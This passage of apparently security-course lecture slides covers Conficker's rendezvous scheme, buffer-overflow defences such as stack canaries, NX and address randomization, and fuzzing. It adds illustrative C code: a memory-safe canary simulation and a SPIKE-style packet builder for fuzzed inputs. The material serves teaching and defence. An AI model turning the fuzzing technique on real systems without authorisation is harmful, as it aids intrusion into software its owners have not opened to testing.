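    const uint8_t peers[] = {1, 53, 53, 80};             /* repeat is deliberate */
    for (size_t i = 0; i < sizeof peers && n < cap; i++)
        out[n++] = (struct flow){IP4(10, 0, 5, 30), IP4(10, 0, 5, peers[i])};
    if (n < cap) out[n++] = (struct flow){IP4(10, 0, 5, 30), IP4(192, 0, 2, 7)};
    return n;
}
```

Counting distinct destinations rather than raw connections keeps a chatty but normal host (repeated traffic to a few servers) below the threshold.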
Conficker : Connectivity
Infected hosts can connect with a “master” to download new versions
  – Variants A & B :
    • Every day generate a list of 250 randomly generated IP addresses
    • Eight times a day attempt connections to a service on every one of those IP addresses
  – The randomness is camouflage
  – Defense attempted : identify the IP addresses in these lists that are not already “registered”, register them (to take control), plant honeypot
• Updates on 3/6/09 and 3/17/09 loaded new version that organized infected hosts into a botnet
• On April 1, 2009 the worm changed behavior, checking into 500 rendezvous points selected from pool of 50,000
  – Anticipated that “something” would happen,
  – But nothing new really did
Hardware supported simple fix
The problem is that attack code is written into the stack or heap, and can be executed from there
The idea of tagging memory with r/w/x permissions has been around a very long time
NX (No eXecute) bit architecture tags pages – called XD (eXecute Disabled) by Intel, XN (eXecute Never) in ARM processor
Naturally there are attacks… to turn this feature off!
Buffer Overflow Defenses
• Write correct code
• Use appropriate languages
• Use tools to analyze problems
• Address Space Randomization
• Make buffers non-executable
  – Should never need to execute code on the stack or on the heap
Writing Correct Code
• Simple solution, but expensive!
  – Performance vs. correctness
  – Software industry practices
• Automatic source-code analysis (limited scope)
  – Super greps like RATS and FlawFinder
  – Embedded compiler analysis
• Audit teams, code review
Programming Languages
• Languages that are type-safe and enforce bound checks
  – E.g., Java, ML, Smalltalk
  – Perl and Taint-mode
• Subsections of language and/or code standards
  – C++ using only smart pointers, std::strings, and STL containers
  – Managed Code and the Common Runtime Library (CRL)
Tools for Buffer Overflow Protection
• LibSafe
  – http://www.research.avayalabs.com/project/libsafe/
  – Intercept calls to functions with known problems and perform extra checks
  – Source is not necessary
• StackGuard and SSP/ProPolice
  – Place “canary” values at key places on stack
  – Terminator (fixed) or random values
  – ProPolice patch to gcc
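How a canary catches an overflow, and why a terminator canary resists string-copy overflows in particular, shown as a memory-safe simulation. This is an added example, not code from the slides or from StackGuard/ProPolice: the frame layout, the canary bytes and all names are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simulated frame (illustrative layout, not a real ABI):
 * [ 16-byte buffer ][ 4-byte canary ][ 4-byte saved return address ] */
#define BUF_LEN   16
#define FRAME_LEN (BUF_LEN + 4 + 4)

/* Constructed terminator-style canary: NUL, CR, LF, 0xFF. */
static const uint8_t CANARY[4]    = {0x00, 0x0d, 0x0a, 0xff};
static const uint8_t SAVED_RET[4] = {0x11, 0x22, 0x33, 0x44};

enum outcome { RET_INTACT, OVERFLOW_DETECTED, RET_OVERWRITTEN };

/* strcpy-like copy: ignores BUF_LEN and stops only at the first NUL in src.
 * Clamped to FRAME_LEN so the simulation itself never writes out of bounds. */
static void unchecked_copy(uint8_t *frame, const uint8_t *src, size_t n) {
    size_t i;
    for (i = 0; i < n && i < FRAME_LEN - 1 && src[i] != 0; i++)
        frame[i] = src[i];
    frame[i] = 0;
}

/* One simulated call: prologue places the canary, body copies the input,
 * epilogue checks the canary before the saved return address is used. */
enum outcome call_with_input(const uint8_t *src, size_t n, int use_canary) {
    uint8_t frame[FRAME_LEN] = {0};
    if (use_canary)
        memcpy(frame + BUF_LEN, CANARY, sizeof CANARY);
    memcpy(frame + BUF_LEN + 4, SAVED_RET, sizeof SAVED_RET);

    unchecked_copy(frame, src, n);

    if (use_canary && memcmp(frame + BUF_LEN, CANARY, sizeof CANARY) != 0)
        return OVERFLOW_DETECTED;   /* a real epilogue would abort here */
    if (memcmp(frame + BUF_LEN + 4, SAVED_RET, sizeof SAVED_RET) != 0)
        return RET_OVERWRITTEN;
    return RET_INTACT;
}
```

An input that embeds the known canary bytes still cannot get past them: the copy stops at the canary's leading NUL, so the return slot is never reached.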
Address Space Randomization
• Vary the base stack address with each execution
  – Stack smashing must have absolute address to overwrite function return address
  – Enabled by default in some Linuxes (e.g., FC3)
• Wastes some address space
  – Less of an issue once we have 64 bit address space
• Not absolute
  – Try many times and get lucky
Misc.
Fuzzing
• A variant of the fault injection model
  – Create “fuzzed” input to cause errors
• ShareFuzz
  – Intercept all getenv() calls to return very, very long strings
More Fuzz - SPIKE
• An input language for creating variant network packets
• From WireShark output, make it easy to express new packets
  – a_binary("00 01 02 03") Data: <00 01 02 03>
  – a_block_size_big-endian_word("Blockname"); Data: <00 01 02 03 00 00 00 00>
  – a_block_start("Blockname") a_binary("05 06 07 08") Data: <00 01 02 03 00 00 00 00 05 06 07 08>
  – a_block_end("Blockname"); Data: <00 01 02 03 00 00 00 04 05 06 07 08>
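The size field in the sequence above is reserved as zeros and back-filled when the block closes, so the length stays consistent however the fuzzer varies the body and the test input reaches the parser behind the length check. A minimal builder reproducing that behavior follows as an added example; it is not SPIKE's code, and the `pkt_*` names and the 64-byte packet limit are hypothetical.

```c
#include <stdint.h>
#include <string.h>

#define MAX_PKT 64

struct pkt {
    uint8_t buf[MAX_PKT];
    size_t  len;       /* bytes written so far */
    size_t  size_at;   /* offset of the reserved 4-byte size field */
    size_t  block_at;  /* offset where the block body begins */
};

/* Append raw bytes; returns 0 on success, -1 if they would not fit. */
static int pkt_binary(struct pkt *p, const uint8_t *data, size_t n) {
    if (n > MAX_PKT - p->len) return -1;
    memcpy(p->buf + p->len, data, n);
    p->len += n;
    return 0;
}

/* Reserve a big-endian 32-bit size field; it stays zero until the block ends. */
static int pkt_block_size_be32(struct pkt *p) {
    static const uint8_t zero[4] = {0, 0, 0, 0};
    p->size_at = p->len;
    return pkt_binary(p, zero, sizeof zero);
}

static void pkt_block_start(struct pkt *p) { p->block_at = p->len; }

/* Close the block: back-fill the reserved field with the measured body length. */
static void pkt_block_end(struct pkt *p) {
    uint32_t n = (uint32_t)(p->len - p->block_at);
    for (int i = 0; i < 4; i++)
        p->buf[p->size_at + i] = (uint8_t)(n >> (24 - 8 * i));
}

/* Slide's sequence with a caller-chosen body; returns packet length, 0 if too big. */
size_t build_packet(struct pkt *p, const uint8_t *body, size_t body_len) {
    static const uint8_t hdr[4] = {0x00, 0x01, 0x02, 0x03};
    memset(p, 0, sizeof *p);
    if (pkt_binary(p, hdr, sizeof hdr) || pkt_block_size_be32(p)) return 0;
    pkt_block_start(p);
    if (pkt_binary(p, body, body_len)) return 0;
    pkt_block_end(p);
    return p->len;
}
```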
Exploit Frameworks
• Metasploit
  – http://www.metasploit.com/index.html
• Canvas
  – http://www.immunitysec.com
• Core Impact
  – http://www.coresecurity.com/products/coreimpact/index.php
Defense Through Attack
• Ethical hacking
  – You too can become a certified ethical hacker
    • http://www.wired.com/news/infostructure/0,1377,64008,00.html
    • http://www.vigilar.com/training/ceh/index.html?gclid=CKSSs-_EvIgCFSAeWAodGm7MaQ
• Hip term for
  – Penetration Testing
  – Vulnerability analysis
  – Vulnerability researching
Penetration Testing
• Bring in outside team to “attack” system
  – Well-defined rules of engagement, e.g.,
    • no DOS but social engineering is allowed
    • Specified target of attack
    • Cause no permanent damage
    • Amount of inside knowledge
• Benefits
  – Ability to think outside the box may reveal new issues
• Concerns
  – All discovered flaws reported?
  – Probably not systematic
Vulnerability Research
• Find exploits in deployed software
  – Zero Day exploit
  – Exploit that is released before fix is available
• Ethical issues once exploit is found
  – How soon to reveal exploit after giving vendor heads up?
  – Can you protect your customers in the meantime?
Software Fault Injection
• Hardware fault injection well used and understood
  – Software fault injection still emerging
  – Active research area at CSL
• Identify input areas
  – Generally network, but could also be files, environment variables, command line
• Inject bad inputs and see what happens
Fault Injection Model
[Diagram: Server, Client, Fault Injector, Auditor]